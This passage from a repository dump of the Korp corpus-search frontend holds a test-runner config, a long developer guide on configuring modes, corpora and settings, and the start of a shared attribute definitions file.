structAttributes: {\n text_author: { label: `author` },\n text_lang: { label: `lang` },\n text_title: { label: `title` },\n text_title1: { label: `text_title1` }, // not sure why we have multiple titles [DWH]\n text_title2: { label: `text_title2` }, // not sure why we have multiple titles [DWH]\n },\n\n};\n\nsettings.corpusListing = new CorpusListing(settings.corpora);\n"
},
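As a usage sketch of the mode file above: a second corpus could be added to the `crk` folder like this. The corpus id `hypothetical_corpus` and its metadata are invented for illustration; `spWithin`, `spContext` and `attrs` come from `modes/common.js` as in the real entry.

```javascript
// Hypothetical corpus entry, shaped like wolfart_ahenakew above.
settings.corpora.hypothetical_corpus = {
    id: `hypothetical_corpus`,
    title: `A Hypothetical Corpus`,
    description: `Invented here only to show the shape of a corpus entry`,
    within: spWithin,
    context: spContext,
    attributes: {
        lemma: attrs.baseform,
        msd: attrs.msd,
    },
    structAttributes: {
        text_title: { label: `title` },
    },
};

// Make it reachable from the folder and rebuild the corpus listing.
settings.corporafolders.crk.contents.push(`hypothetical_corpus`);
settings.corpusListing = new CorpusListing(settings.corpora);
```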
{
"alpha_fraction": 0.6199133992195129,
"alphanum_fraction": 0.6233766078948975,
"avg_line_length": 25.25,
"blob_id": "19d878a1b2a6f504c6d0c91b4875af6ca6ef4a9e",
"content_id": "6432e2cbad07651d23a1f47e81c6f446cf9460c8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1155,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 44,
"path": "/test/karma/karma.conf.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "webpackConfig = require('../../webpack.common.js')\nwebpackConfig.mode = 'development'\nwebpackConfig.entry = {\n bundle: './test/karma/index.js'\n}\n\nmodule.exports = function(config) {\n config.set({\n // base path, that will be used to resolve files and exclude\n basePath: '../../',\n\n // testing framework to use (jasmine/mocha/qunit/...)\n frameworks: ['jasmine'],\n\n // list of files / patterns to exclude\n exclude: [],\n client: {\n captureConsole: true\n },\n // web server port\n port: 8080,\n reporters: ['progress'],\n colors: true,\n // possible values: LOG_DISABLE || LOG_ERROR || LOG_WARN || LOG_INFO || LOG_DEBUG\n logLevel: config.LOG_DEBUG,\n files: [\n { pattern: 'test/karma/spec/*.js', watched: false }\n ],\n preprocessors: {\n 'test/karma/spec/*.js': [ 'webpack' ]\n },\n webpack: webpackConfig,\n\n // enable / disable watching file and executing tests whenever any file changes\n autoWatch: false,\n\n browsers: ['ChromeHeadless'],\n concurrency: Infinity,\n\n // Continuous Integration mode\n // if true, it capture browsers, run tests and exit\n singleRun: true\n });\n}\n"
},
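For reference, a minimal Jasmine spec matching the `files`/`preprocessors` patterns in the config above might look like the sketch below (the suite and expectation are placeholders; the webpack preprocessor bundles it before ChromeHeadless runs it):

```javascript
// test/karma/spec/example.spec.js -- picked up by 'test/karma/spec/*.js'
describe('smoke test', function() {
    it('runs inside ChromeHeadless', function() {
        expect(1 + 1).toBe(2);
    });
});
```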
{
"alpha_fraction": 0.7117212414741516,
"alphanum_fraction": 0.7149211168289185,
"avg_line_length": 52.32935333251953,
"blob_id": "74ed605d954c0c41a13e1e5625d224f9d538d224",
"content_id": "c112a291f6fdf7a8ed1147dbae49b66bef54e47b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 31257,
"license_type": "permissive",
"max_line_length": 662,
"num_lines": 586,
"path": "/doc/frontend_devel.md",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "# Setting up the Korp Frontend\n\nThis section describes how to get the Korp frontend up and running on your own machine and presents the available customization. In this step it is necessary to have a backend with at least one corpus installed. For testing purposes, Språkbankens Korp backend may be enough. It is also assumed that you have a web server available (such as Apache or Nginx).\n\nDownload the latest release from [Github](https://github.com/spraakbanken/korp-frontend/releases). The code is distributed under the [MIT license][MIT].\n\nAn alternative to downloading a released bundle is to clone the repository:\n\n```\ngit clone https://github.com/spraakbanken/korp-frontend.git\n```\n\nBe sure to use the `main`-branch for production environments.\n\nIn this text Korp refers to the frontend only.\n\n## Configuration\n\nIn ideal cases, no changes needs to be done in Korp. Instead\nall configuration will reside in another directory. How to make the build\nsystem detect this directory and its contents will be described below.\n\n### Make Korp detect the configuration directory\n\nTo make Korp detect the configuration directory,\nuse a `run_config.json` file in the root of the Korp repo with the following content:\n\n```\n{\n \"configDir\": \"../path/to/my/configuration/folder\"\n}\n```\n\n### Structure of the configuration directory\n\nThe following type of files are needed to make Korp work properly. They\nare all described in the documentation.\n\n- `config.js`\n- `modes/common.js`\n- `modes/*mode.js`\n- `translations/*.json`\n\n(In short, a mode is a collection of corpora that may have different\n functionality and are described later).\n\nFor more advanced use cases there is also the possibility to add scripts,\n styling and HTML-templates/snippets.\n\n - `styles/`\n - `scripts/`\n - `views/`\n\n Styles and scripts will be automatically loaded.\n Files matching `views/*.html` can be loaded manually by requiring them\n using the name `customtemplates`. The result will be a string containing\n the (minified) HTML, for example, a template for an Angular\n directive: `template: require(\"customviews/my_view.html\")`. If you are not\n writing any custom scripts (i.e. files in `scripts/`), this can be\n completely ignored.\n\n### Content of `config.js`\n\nThe main configuration file of Korp is `config.js`. In this file we have\nconfiguration for where the backend is located, what features should be turned\non or off etc. Corpora configuration is done in the modes files. There is more\ninformation about that later in this document.\n\nAll configuration parameters are added to a global `settings`-object. For example:\n\n```\nsettings.defaultLanguage = \"en\"\n```\n\nAvailable settings will be described in feature sections and there is also a\n[summary of all settings](#summary-settings). A good start could be to just\ncopy `config.js` from this repository to your configuration directory.\n\n### Content of `modes/common.js`\n\nAfter `config.js`, but before any mode configuration, `modes/common.js` is\nloaded. This may include definitions which are used in several modes s.a. a set\nof attributes. This helps to keep `config.js` clean. 
This file must export any\nvariables that can be used in a mode.\n\n```\nvar veryCommonAttributes = {\n    pos: {\n        label: \"pos\",\n        order: 600\n    }\n}\nmodule.exports = {\n    veryCommonAttributes\n}\n```\n\nNow `veryCommonAttributes` will be available in all mode-files.\n\n### Localization\n\nIn `app/translations` there are several files containing translations for\ndifferent parts of the application.\n\nFiles prefixed with `locale` control translations that are hard-coded into the\napplication, and thus it should not be necessary to change these if only\ncustomization is done. The files prefixed with `corpora` however are\ntranslations of corpora attributes and values and must be replaced with data\nsuitable for the specific set of corpora the Korp installation serves. The\nfiles are JSON structures that, for each language, tie a __translation key__\nto a particular __string__ in that language. You should start with empty corpora\ntranslation files and then add the translations as you add corpora.\n\nThe translations folder also contains a Python script - `check_locale_files.py` -\nthat makes sure that each set of translation files has each translation key\npresent in all different languages.\n\n#### Adding Languages\n\nTo add a new language in the frontend, for example Lithuanian, add a `corpora-lt.json` and `locale-lt.json`. `locale-lt.json` may be copied from an existing locale-file and then translated. Then add the language in `config.js`:\n\n   `settings.languages = [\"sv\", \"en\", \"lt\"];`\n\nTo make Lithuanian the default language, use:\n\n   `settings.defaultLanguage = \"lt\"`\n\nTo add a button in the interface for Lithuanian, open\n`includes/header.pug` and look for:\n\n```\na(data-mode='en', ng-click=\"lang = 'en'\") {{'english' | loc:lang}}\n```\n\nand copy this line, substituting `lt` for `en`\nwhere applicable.\n\n##### Angular.js locale\n\nTo enable full localization (dates in a datepicker for example), an extra file\nis necessary. Download `angular-locale_lt.js` from here:\n\n[Angular i18n][angular-i18n]\n\nPut the file in `app/translations/`.\n\n## Modes\n\nEach Korp installation has a series of _Modes_ in the top left corner, which\nare useful for presenting different faces of Korp that might have different\nlayouts or functionality. In the Swedish version the parallel corpora have their\nown mode because their KWIC results don't mix particularly well with the\n'normal' results.\n\n#### Adding modes\n\nRelevant setting fields are `settings.visibleModes` and `settings.modeConfig`. The former controls how many modes are visible in the header (the rest are hidden away in a menu). The latter looks like this:\n\n    [\n        {\n          localekey: \"modern_texts\",\n          mode: \"default\"\n        },\n        {\n          localekey: \"parallel_texts\",\n          mode: \"parallel\"\n        },\n        {\n          localekey: \"faroese_texts\",\n          mode: \"faroe\"\n        }\n    ]\n\n\nThe `localekey` key corresponds to a key from the localization files. The `mode` key is the mode identifier and is used to load a script file from the `modes` folder, in\nthe configuration directory, corresponding to that ID. So if you click the mode selector's 'parallel' entry, the page refreshes and the `modes/parallel_mode.js` will be loaded.\n\nThe mode called `default` will always be loaded first. If there is no need for more than one mode, leave `settings.modeConfig` empty.\n\n## Corpora\nThe config file contains the corpora declaration, wherein the available corpora are declared together with information about which metadata fields are searchable in them. 
Adding a test corpus is as simple as:\n\n\n    settings.corpora = {};\n    settings.corpora[\"testcorpus\"] = {\n        id: \"testcorpus\",\n        title: \"The Korp Test Corpus\",\n        description: \"A test corpus for testing Korp.\",\n        within: {\"sentence\": \"sentence\"},\n        attributes: {\n            pos: {\n                label: \"pos\",\n                opts: {\n                    \"is\": \"=\",\n                    \"is_not\": \"!=\"\n                }\n            }\n        },\n        structAttributes: {\n        }\n    }\n\n* `id`: Short form title, should correspond to the key name of the definition.\n* `title`: Long form title, for display in the corpus chooser.\n* `description`: For display in the corpus chooser.\n* `within`: What are the structural elements of the corpus? See `defaultWithin` in [settings summary](#summary-settings) for format and more information.\n* `attributes`: each key here refers to a word attribute in Corpus Workbench. Their values are JSON structures with a few attributes of their own; they are concerned with generating the necessary interface widgets in Extended Search, display in sidebar and statistics. They are:\n    * `label`: a translation key for the attribute's name\n    * `limitedAccess`: `boolean`, it will not be possible to select this corpus unless a user is logged in and has the correct credentials.\n    * `displayType`: set to `'hidden'` to fetch the attribute, but never show it in the frontend. See `hideSidebar`, `hideStatistics`, `hideExtended` and `hideCompare` for more control.\n    * `translationKey`: you can declare a prefix for the translation keys of the dataset here. This is so the corpora translation file doesn't get too messy: a simple kind of namespacing.\n    * `extendedTemplate`: Angular template used in conjunction with the `extendedController` to generate an interface widget for this attribute. See <#ref customizing-extended-search|customizing extended search>.\n    * `extendedController`: Angular controller that is applied to the template. See <#ref customizing-extended-search|customizing extended search>.\n    * `opts`: this represents the auxiliary select box where you can modify the input value. See `defaultOptions` in [settings summary](#summary-settings) for format and more information.\n    * `hideSidebar`: Default: `false`. Hide attribute in sidebar.\n    * `hideStatistics`: Default: `false`. Should it be possible to compile statistics based on this attribute?\n    * `hideExtended`: Default: `false`. Should it be possible to search using this attribute in extended?\n    * `hideCompare`: Default: `false`. Should it be possible to compare searches using this attribute?\n    * `type`: Possible values:\n        - \"set\" - The attribute is formatted as \"|value1|value2|\". Include contains and not contains in `opts`.\n          In the sidebar, the value will be split before being formatted. When using compile / `groupby` on a \"set\" attribute in a statistics request, it will be added to `split`.\n        - \"url\" - The value will be rendered as a link to the URL and possibly truncated if too long.\n    * `pattern`: HTML snippet with placeholders for replacing values. Available is `key` (attribute name) and `value`. Also works for sets. Example: `'<p style=\"margin-left: 5px;\"><%=val.toLowerCase()%></p>'`\n    * `display`: How to display attribute in sidebar. Currently only supported for sets and `expandList` (see below). In the future more ways to display might be added here.\n        * `expandList`: Render set as a list where the first element is visible and a button to show or hide the rest of the elements.\n            * `splitValue`: Function to split up values if there are sets within the set. 
Example: `function(value) { return value.split(','); }`\n            * `searchKey`: If `display.expandList.internalSearch` is set to `true`, links will be rendered to search for the value in Korp, using this key in the CQP-expression.\n              Omit to use same key as attribute name.\n            * `joinValues`: Interleave this string with all values on the row.\n            * `stringify`: Optional override of outer `stringify`.\n            * `linkAllValues`: Should the `internalSearch` be enabled for all values or only the first one in the set?\n            * `internalSearch`: Alternative function to transform the attribute key and value to a CQP-expression.\n              Example: `function(key, value) { return '[' + key + '=\"' + value + '\"]'; }`\n    * `sidebarComponent`: If the `display` key above doesn't do enough, you can write a custom interactive component using `sidebarComponent.template` (an Angularjs template string) and `sidebarComponent.controller` (an Angularjs controller function). Useful for having e.g. a modal window pop up, or for rendering a small video player in the sidebar, or for anything else that isn't simple text or a link. `$scope.model` holds the value, so assigning to this variable will change the current CQP expression. See the `complemgram` and `compwf` implementation at the [Korp SB Config](https://github.com/spraakbanken/korp-frontend-sb/blob/dev/app/modes/common.js).\n    * `internalSearch`: `boolean`. Should the value be displayed as a link to a new Korp search? Only works for sets. Searches for CQP-expression: `[<attrName> contains \"<regescape(attrValue)>\"]`\n    * `externalSearch`: Link with placeholder for replacing value. Example `https://spraakbanken.gu.se/karp/#?search=extended||and|sense|equals|<%= val %>`\n    * `order`: Order of attribute in the sidebar. Attributes with a lower `order`-value will be placed over attributes with a higher `order`-value.\n    * `stringify`: How to pretty-print the attribute in the context of the sidebar. Example: `function(str) { return util.lemgramToString(str, true); }`\n    * `stats_stringify`: How to pretty-print the attribute in the context of the statistics table. The provided formatting function will be passed an array of labels. Example: `stats_stringify: function(values) {return values.join(\" \")}`.\n    * `stats_cqp`: How to create a CQP query when clicking a value in the statistics table. The provided formatting function will be passed an array of labels. Example: ```stats_cqp: function(values) {return `pos_tag=\"${values.join(\" | \")}\"`}```. \n    * `isStructAttr`: `boolean`. If `true` the attribute will be treated as a structural attribute in every sense except that it will be included in the `show` query parameter instead of `show_struct` for KWIC requests. Useful for structural attributes that extend to smaller portions of the text, such as name tagging.\n    * optional keys and values that can be utilized in the extendedTemplate / extendedController. See <#ref customizing-extended-search|customizing extended search>.\n\n* `structAttributes`: refers to higher level metadata attributes. Examples include author, publishing year, URL etc. Structural attributes support the same settings as the word attributes.\n\n* `customAttributes`: creates fields in the sidebar that have no corresponding attribute in the backend. Useful for combining two different attributes. 
All settings concerning sidebar format for normal attributes apply in addition to:\n    * `customType`: `\"struct\"` / `\"pos\"` - decides if the attribute should be grouped under word attributes or text attributes.\n    * `pattern`: Same as pattern for normal attributes, but `struct_attrs` and `pos_attrs` also available. Example: `'<p style=\"margin-left: 5px;\"><%=struct_attrs.text_title - struct_attrs.text_description%></p>'`\n* `readingMode`: If set, enables reading mode/text view for the\n  corpora. A link will appear in the sidebar and if clicked a new tab\n  containing the text will be opened. This depends on your corpus having a\n  structural attribute identifying the line in the KWIC (such as `sentence_id`;\n  this may be configured with `settings.readingModeField`)\n  and also a `_head` and `_tail` attribute, containing\n  the whitespace before and after a token. The value can be set to:\n  ```\n  readingMode: {\n    directive: \"standard-reading-mode\"\n  }\n  ```\n  for basic support. If something else is needed you can write your own directive\n  in `scripts/` and use that one instead. Contact Språkbanken for an example of\n  how to write a directive.\n\n## Customizing extended search\n\nIt is possible to customize the standard input field of extended search into anything. Any key can be added to an attribute to be provided to the `extendedController` / `extendedTemplate`. Simple example:\n\n\n    var myReusableTemplate = '<div><input ng-if=\"inputType == \\'text\\'\" type=\"text\"><input ng-if=\"inputType == \\'number\\'\" type=\"number\"></div>';\n\n    var myController = function($scope, $location) {\n        // $scope.inputType is available here also\n        // dependency injection of Angular services such as $location are possible\n    };\n\n    settings.corpora[\"testcorpus\"] = {\n        id: \"testcorpus\",\n        title: \"The Korp Test Corpus\",\n        description: \"A test corpus for testing Korp.\",\n        attributes: {\n            myAttr: {\n                label: \"myAttr\",\n                extendedTemplate: myReusableTemplate,\n                extendedController: myController,\n                inputType: \"text\"\n            }\n        }\n    };\n\nHowever, `extendedController` is not mandatory and only shown in this example for documentation purposes.\n\n### Template requisites\n\nIn order for your template to work, it must set its value in `scope.model`, for example by using `ng-model=\"model\"` for input-fields.\n\n### autoc\n\nA directive that autocompletes word forms to lemgrams or senses using Karp. Used in the following way:\n\n    <autoc placeholder=\"placeholder\" type=\"lemgram\" model=\"model\"\n        disable-lemgram-autocomplete=\"disableLemgramAutocomplete\"\n        text-in-field=\"textInField\">\n\nWhere `type` may be either `lemgram` or `sense`. `model` will be the selected lemgram / sense. `textInField` will be actual user input\n(user did not select anything). Placeholder will contain the pretty-printed lemgram / sense. It is also possible to make the element fall back to a \"normal\"\ntext field by setting `disableLemgramAutocomplete` to `false`.\n\n### escaper\n\n`escaper` is a directive that takes the user's input and escapes any regexp characters before saving it to `scope.model`.\nWhen the model changes it automatically de-escapes any regexp characters before showing the value to the user. Input must be saved to `scope.input` for it to work. Example: `<input ng-model=\"input\" escaper>`\n\n## Parallel Corpora\n\nParallel corpora need to have their own mode. Use `modes/parallel_mode.js`, but replace the corpus definitions. 
Change the line `var start_lang = \"swe\";` to whatever language should be the default search language.\n\nThe corpora declaration for parallel corpora is different in some important ways. Example:\n\n~~~~~~~\nsettings.corpora[\"saltnld-sv\"] = {\n    id: \"saltnld-sv\",\n    lang: \"swe\",\n    linkedTo: [\"saltnld-nl\"],\n    title: \"SALT svenska-nederländska\",\n    context: context.defaultAligned,\n    within: {\n    \t\"link\": \"meningspar\"\n    },\n    attributes: {},\n    structAttributes: {}\n};\n~~~~~~~\n~~~~~~~\nsettings.corpora[\"saltnld-nl\"] = {\n    id: \"saltnld-nl\",\n    lang: \"nld\",\n    linkedTo: [\"saltnld-sv\"],\n    title: \"SALT svenska-nederländska\",\n    context: context.defaultAligned,\n    within: {\n    \t\"link\": \"meningspar\"\n    },\n    attributes: {},\n    structAttributes: {},\n    hide: true\n};\n~~~~~~~\n\nThe corpus configuration for parallel corpora needs to make explicit the links between the declared corpora. This is done using the `linkedTo` property. A corpus may declare any amount of links to other corpora. Also notice the `lang` property, used for building the correct language select menu. The `within` attribute should use the `\"link\": \"meningspar\"` value. Also note the `hide` attribute which prevents both subcorpora from being listed in the corpus chooser widget.\n\n## Rendering attribute values in the statistics-view\nThe appearance of the leftmost columns of hits in the stats table can be controlled by editing `app/config/statistics_config.js`. These change according to the 'compile based on' select menu and might need a different stringification method depending on the chosen attribute. Make sure the function returns valid html. A known issue is that annotations containing spaces work less than perfectly when searching for more than one token.\n\n## Autocompletion menu\n\nKorp features an autocompletion list for searches in the Simple Search as well as in Extended for those corpus attributes configured to use the `autoc`-directive (see <#ref autoc|autoc-section>). This is implemented using an Angular.js directive `autoc` that calls Karp's autocompletion function. Using Karp, Korp can autocomplete senses and lemgrams. To disable autocompletion in simple search use `settings.autocomplete = false`.\n\n## Word picture\n\nThe word picture-config object looks like this:\n\n    settings.wordPictureConf = {\n        pos_tag: [table_def1, table_def2...]\n    }\n\nwhere `table_def` is an array of objects that describe the resulting word picture table. `table_def1` above might look like this:\n\n    [\n        {rel: \"subject\", css_class: \"color_blue\"},\n        \"_\",\n        {rel: \"object\", css_class: \"color_purple\"},\n        {rel: \"adverbial\", css_class: \"color_purple\", field_reverse: false}\n    ]\n\nThe `\"_\"` refers to the placement of the hit in the table order. The value for `rel` refers to a key in `settings.wordpictureTagset` looking like this:\n\n    settings.wordpictureTagset = {\n        // the actual value for the pos-tag must be given in this object\n        pos_tag: \"vb\", \n\n        subject: \"ss\",\n        object: \"obj\",\n        adverbial: \"adv\"\n    }\n\nThe values are the actual relations returned by the backend. The relation used is determined by `field_reverse`. If `field_reverse` is `false` (default), `dep` is used, else `head`. If you find yourself with a table full of the search word just flip the `field_reverse` switch.\n\n`css_class` simply gives a class to the column, useful for applying background color. 
The last supported attribute is `alt_label`, used for when another value than the relation name should be used for the table header.\n\n## Map\n\nKorp's map uses annotations to get locations. The user selects rows from the statistics table and points derived from different rows will have different colors. The selected corpora must have structural attributes with location data in them. The format is `Fukuoka;JP;33.6;130.41667` - the location name, the country, latitude and longitude separated by `;`.\n\nAlso the name of the attribute must contain `\"__\"` and `\"geo\"` to show up in the list of supported attributes.\n\n__settings.newMapEnabled__ - `boolean`. Whether the map should be enabled. The weird name is because another map existed before, but has since been removed. The name will change in upcoming releases.\n__settings.mapCenter__ - Where the center of the map should be located when the user opens the map. Example: \n\n    settings.mapCenter = {\n        lat: 62.99515845212052,\n        lng: 16.69921875,\n        zoom: 4\n    };\n\n\n## News widget\n\nBy setting a `newsDeskUrl` on settings, the news widget is enabled. The widget simply fetches a json-file from the given URL. Short example of such a file, including only one news item with its title and body in two languages and a date:\n\n    [\n        {\n            \"h\": {\n                \"en\": \"<p>Longer description in English</p>\",\n                \"sv\": \"<p>Längre beskrivning på svenska</p>\"\n            },\n            \"t\": {\n                \"en\": \"English Title\",\n                \"sv\": \"Svensk Titel\"\n            },\n            \"d\": \"2017-03-01\"\n        }\n    ]\n\n## <a name=\"summary-settings\">Summary of settings</a>\n\nSettings are required unless specified to be optional.\n\n__autocomplete__ - Boolean. Enable autocomplete (see **autoc**-directive) for simple search.\n\n__languages__ - Array of supported interface language codes such as `[\"en\", \"sv\"]`\n\n__defaultLanguage__ - The default interface language. Example: `\"sv\"`\n\n__downloadFormats__ - Available formats of KWIC-download. See supplied `config.js`.\n\n__downloadFormatParams__ - Settings for KWIC-download. See supplied `config.js`.\n\n__wordAttributeSelector__ - `\"union\"` / `\"intersection\"`. Controls attribute list in extended search. Use all selected corpora *word* attributes or only the attributes common to selected corpora.\n\n__structAttributeSelector__ - Same as __wordAttributeSelector__, but for structural attributes.\n\n__reduceWordAttributeSelector__ - Same as __wordAttributeSelector__, but for the \"compile based on\"-configuration in statistics. Warning: if set to `\"union\"`, the statistics call will fail if the user selects an attribute that is not supported by a selected corpus.\n\n__reduceStructAttribute_selector__ - Same as __reduceWordAttributeSelector__, but for structural attributes.\n\n__newsDeskUrl__ - See **News widget**. Optional.\n\n__wordpictureTagset__ - See **Word picture**\n\n__wordPictureConf__ - See **Word picture**\n\n__visibleModes__ - See **Adding modes**\n\n__modeConfig__ - See **Adding modes**\n\n__primaryColor__ - Background color in corpus chooser, CSS color. Example: `\"rgb(221, 233, 255)\"`\n\n__primaryLight__ - Background color of settings area, CSS color. Example: `\"rgb(221, 233, 255)\"`\n\n__defaultOverviewContext__ - The default context for KWIC-view. Use a context that is supported by the majority of corpora in the mode (URLs will be shorter). E.g.: `\"1 sentence\"`. 
For corpora that do not support this context an additional parameter will be sent to the backend based on the `context`-setting in the corpus.\n\n__defaultReadingContext__ - Same as __defaultOverviewContext__, but for the context-view. Use a context larger than the __defaultOverviewContext__.\n\n__defaultWithin__ - An object containing the structural elements of a corpus. Default within is used unless a corpus overrides the setting using `within`. Example:\n\n    settings.defaultWithin = {\n        \"sentence\": \"sentence\",\n        \"paragraph\": \"paragraph\"\n    };\n\nIn simple search, we will search within the default context and supply extra information for the corpora that do not support the default context.\n\nIn extended search, the default `within` will be used unless the user specifies something else. In that case the user's choice will be used for all corpora that support it and for corpora that do not support it, a supported `within` will be used.\n\n__cqpPrio__ - An array of attributes to order and-clauses in CQP-expressions by. Order the array by how specific an attribute is in increasing order. `word` will probably be the most specific attribute and should be placed last, while POS-tags will be near the beginning. A well ordered list will speed up queries significantly.\n\n__defaultOptions__ - Object containing the default operators for extended search. May be overridden for each attribute by setting `opts` on the attribute-configuration. The object keys are translation keys and values are the frontend's internal representation of CQP. Example:\n\n    settings.defaultOptions = {\n        \"is\": \"=\",\n        \"is_not\": \"!=\",\n        \"starts_with\": \"^=\",\n        \"contains\": \"_=\",\n        \"ends_with\": \"&=\",\n        \"matches\": \"*=\",\n        \"matches_not\": \"!*=\",\n    }\n\nExplanation of internal format:\n\n| Operator | Internal representation | CQP | Note |\n| --- | --- | --- | --- |\n| starts with | `[key ^= \"val\"]` | `[key = \"val.*\"]` | |\n| contains | `[key _= \"val\"]` | `[key = \".*val.*\"]` | |\n| ends with | `[key &= \"val\"]` | `[key = \".*val\"]` | |\n| matches | `[key *= \"val\"]` | `[key = \"val\"]` | Used with the `escaper`-directive; regexp special characters will not be escaped. |\n| matches not | `[key !*= \"val\"]` | `[key != \"val\"]` | Used with the `escaper`-directive; regexp special characters will not be escaped. |\n\n**TODO: move these explanations to a better place** Then we have the five last operators again, but using `contains` instead of `=`:\n\n| Operator | Internal representation | CQP | Note |\n| --- | --- | --- | --- |\n| starts with | `[key starts_with_contains \"val\"]` | `[key contains \"val.*\"]` | |\n| contains | `[key incontains_contains \"val\"]` | `[key contains \".*val.*\"]` | Strange name due to CQPParser getting confused by `contains_contains` |\n| ends with | `[key ends_with_contains \"val\"]` | `[key contains \".*val\"]` | |\n| matches | `[key regexp_contains \"val\"]` | `[key contains \"val\"]` | Used with the `escaper`-directive; regexp special characters will not be escaped. |\n| matches not | `[key not_regexp_contains \"val\"]` | `[key not contains \"val\"]` | Used with the `escaper`-directive; regexp special characters will not be escaped. |\n\n__cgiScript__ - URL to Korp CGI-script\n\n__downloadCgiScript__ - URL to Korp download CGI-script\n\n__wordpicture__ - Boolean. Enable word picture.\n\n__statisticsCaseInsensitiveDefault__ - Boolean. Selects case-insensitive for \"compile based on\" by default.\n\n__inputCaseInsensitiveDefault__ - Boolean. Selects case-insensitive for simple search by default.\n\n__corpora__ - See **Corpora**\n\n__corpusListing__ - After specifying all corpora in a modes-file use:\n`settings.corpusListing = new CorpusListing(settings.corpora);` to enable the configuration. 
For parallel corpora use: `settings.corpusListing = new ParallelCorpusListing(settings.corpora, parseLocationLangs());`\n\n__corporafolders__ - Create a directory-structure in corpus chooser. Example:\n\n    settings.corporafolders.foldername = {\n        title: \"A folder\",\n        contents: [\"corpus1\", \"corpus2\"],\n        description: \"Optional description\"\n    };\n\n    settings.corporafolders.foldername.subfolder = {\n        title: \"A sub folder\",\n        contents: [\"corpus3\", \"corpus4\"]\n    }\n\n__preselectedCorpora__ - An array of corpus (internal) names or folder names. Given corpora and corpora in folders will be selected on load. To select only a subfolder write `folder.subfolder`.\n\n__newMapEnabled__ - See **Map**.\n\n__mapCenter__ - See **Map**.\n\n__hitsPerPageValues__ - An array of possible numbers of hits per page, for example: `[25,50,75,100]`\n\n__hitsPerPageDefault__ - The number of hits per page that Korp should select by default. If omitted, the fallback value is the first element in `hitsPerPageValues`\n\n# Developing the Korp Frontend\n\nHere is where we present details on how to install development dependencies for the Korp frontend and how to build and distribute the frontend code.\n\n## Source code\n\nThe source code is available on [Github][github-frontend].\n\n## Setting up the development environment\n\nThe Korp frontend uses a plethora of technologies and has a corresponding amount of dependencies. Luckily, a set of package managers does all the heavy lifting and so you should be up and running in no time. Simply follow these steps:\n\n* Install Yarn\n* Fetch the latest Korp source release.\n* `cd` to the Korp folder you just checked out and run `yarn` in order to fetch the local dependencies. This includes libs for compiling and transpiling JavaScript, building, running a dev server, as well as the required client-side JavaScript libs utilized directly by Korp.\n\nYou are now ready to start the dev server; do so by running `yarn dev`. In your browser, open `http://localhost:9111` to launch Korp. Now, as you edit the Korp code, JavaScript and Sass files are automatically compiled/transpiled as required, additionally causing the browser window to be reloaded to reflect the new changes.\n\n## Localization\n\nKorp does runtime DOM manipulation when the user changes language. Using an Angular filter to specify which translation key looks like this:\n\n    <div>{{'my_key' | loc}}</div>\n\n[Deprecation warning] Before the Angular approach we used the `rel` attribute, like so (but you shouldn't any more):\n    `<span rel=\"localize[translation_key]\">...</span>`\n\n## Map\n\nModify the map with configuration, `scripts/map_controllers.coffee` or the Geokorp-component located in `components/geokorp`. Geokorp wraps [Leaflet][leaflet] and adds further functionality such as integration with Angular, marker clustering, marker styling and information when selecting a marker.\n\n## Building a distribution\n\nBuilding a distribution is as simple as running the command `yarn build`. A `dist` folder is created. These are the files to use for production deployment. The build system performs concatenation and minimization of JavaScript and CSS source files, giving the resulting code a lighter footprint.\n\n[MIT]: https://opensource.org/licenses/MIT\n[angular-i18n]: https://github.com/angular/bower-angular-i18n\n[leaflet]: http://leafletjs.com/\n[github-frontend]: https://github.com/spraakbanken/korp-frontend/\n"
},
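To tie several of the attribute options documented above together, here is a hedged sketch of a single word attribute combining `opts`, `order`, `stringify` and `stats_stringify`. The attribute name `mytag` and its formatting are invented for illustration; the option keys follow the documented `defaultOptions` format, and `testcorpus` is the example corpus from the docs.

```javascript
settings.corpora["testcorpus"].attributes.mytag = {
    label: "mytag",                      // translation key for the attribute's name
    order: 10,                           // sidebar position (lower values sort first)
    opts: { "is": "=", "is_not": "!=" }, // operators offered in extended search
    // Pretty-print a raw value in the sidebar.
    stringify: function(str) {
        return str.toUpperCase();
    },
    // Join grouped values in the statistics table.
    stats_stringify: function(values) {
        return values.join(" ");
    }
};
```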
{
"alpha_fraction": 0.5289922952651978,
"alphanum_fraction": 0.5348564386367798,
"avg_line_length": 26.5045166015625,
"blob_id": "fa23a883118699191ff092dcdd50a9a0c27b3762",
"content_id": "9ec67870e0a7bff15dee70ef2aec7c2613759254",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 21377,
"license_type": "permissive",
"max_line_length": 939,
"num_lines": 775,
"path": "/app/modes/common.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "settings.senseAutoComplete = `<autoc model='model' placeholder='placeholder' type='sense' text-in-field='textInField'/>`;\n\nvar karpLemgramLink = `https://spraakbanken.gu.se/karp/#?mode=DEFAULT&search=extended||and|lemgram|equals|<%= val.replace(/:\\\\d+/, '') %>`;\n\nvar liteOptions = {\n is: `=`,\n is_not: `!=`,\n};\n\nvar setOptions = {\n is: `contains`,\n is_not: `not contains`,\n};\n\nvar probabilitySetOptions = {\n is: `highest_rank`,\n is_not: `not_highest_rank`,\n contains: `rank_contains`,\n contains_not: `not_rank_contains`,\n};\n\nvar extendedSetOptions = {\n is: `contains`,\n is_not: `not contains`,\n starts_with: `starts_with_contains`,\n contains: `incontains_contains`,\n ends_with: `ends_with_contains`,\n matches: `regexp_contains`,\n matches_not: `not_regexp_contains`,\n};\n\nvar defaultContext = {\n \"1 sentence\": `1 sentence`,\n};\n\nvar spContext = {\n \"1 sentence\": `1 sentence`,\n \"1 paragraph\": `1 paragraph`,\n};\n\nvar spWithin = {\n sentence: `sentence`,\n paragraph: `paragraph`,\n};\n\nvar attrs = {}; // positional attributes\nvar sattrs = {}; // structural attributes\n\nattrs.pos = {\n label: `pos`,\n translationKey: `pos_`,\n dataset: {\n AB: `AB`,\n \"MID|MAD|PAD\": `DL`,\n DT: `DT`,\n HA: `HA`,\n HD: `HD`,\n HP: `HP`,\n HS: `HS`,\n IE: `IE`,\n IN: `IN`,\n JJ: `JJ`,\n 